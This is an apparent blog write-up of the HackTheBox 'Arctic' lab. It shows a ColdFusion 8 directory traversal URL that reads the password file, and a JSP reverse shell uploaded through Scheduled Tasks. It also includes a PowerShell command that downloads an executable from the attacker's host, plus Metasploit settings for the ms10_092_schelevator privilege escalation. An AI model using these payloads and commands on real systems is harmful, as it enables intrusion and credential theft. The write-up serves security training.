HackTheBox Arctic Writeup

Reconnaissance

Web App Enumeration

Exploitation

Windows Privilege Escalation

________________________________________

Reconnaissance

Run the nmapAutomator.sh script is to automate all of the process of recon/enumeration.

Output reveal port 8500 running unknown service, Let’s browse it

http://10.10.10.11:8500

we have 2 directory lets browse /CFIDE

Web App Enumeration

In /CFIDE directory administrator look intersting lets open it

We get ‘Adobe Coldfusion 8 Administrator’ login page

After googling we find “Adobe ColdFusion - Directory Traversal” exploit

URL : http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

It reveal password hash lets crack it with crackstation online tool

Password is : happyday lets login

After login in Debugging & Logging Category there is a sub-category Scheduled Tasks allows us to upload files. We can Scheduled New Tasks and upload our shell but first generate our shellcode.

Exploitation

To generate shellcode we will use msfvenom

Lets upload our shell

task name : re

url : http://10.10.14.50/RS2.jsp

publish : check save output to a file

file : C:\ColdFusion8\wwwroot\CFIDE\RS2.jsp

After submit Task we have to run a Python SimpleHTTPServer on port 80 and click on Run Scheduled Tasks and start listner

We got Reverse Shell and User flag is in C:\Users\tolis\Desktop\user.txt directory

We have Low Priv shell so lets upgrade our shell for Privilege Escalation. We can generate meterpreter shell and upload via powershell cmd powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.50:80/ps.exe', 'ps.exe')" lets fire up Msfconsole and get reverse shell

Windows Privilege Escalation

sysinfo reveal that system is x64 Architecture and our meterpreter shell is x86 Architecture so lets migrate it

As we are enumerating for priv esc lets search local exploit suggester for priv esc exploits

We can use “exploit/windows/local/ms10_092_schelevator”  Windows Escalate Task Scheduler XML Privilege Escalation

cmd use exploit/windows/local/ms10_092_schelevator

set session 6

set lhost 10.10.14.50

set lport 4444

show options

run

we got the shell root flag is in C:\Users\Administrator\Desktop\root.txt    

Leave a Reply

Your email address will not be published. Required fields are marked *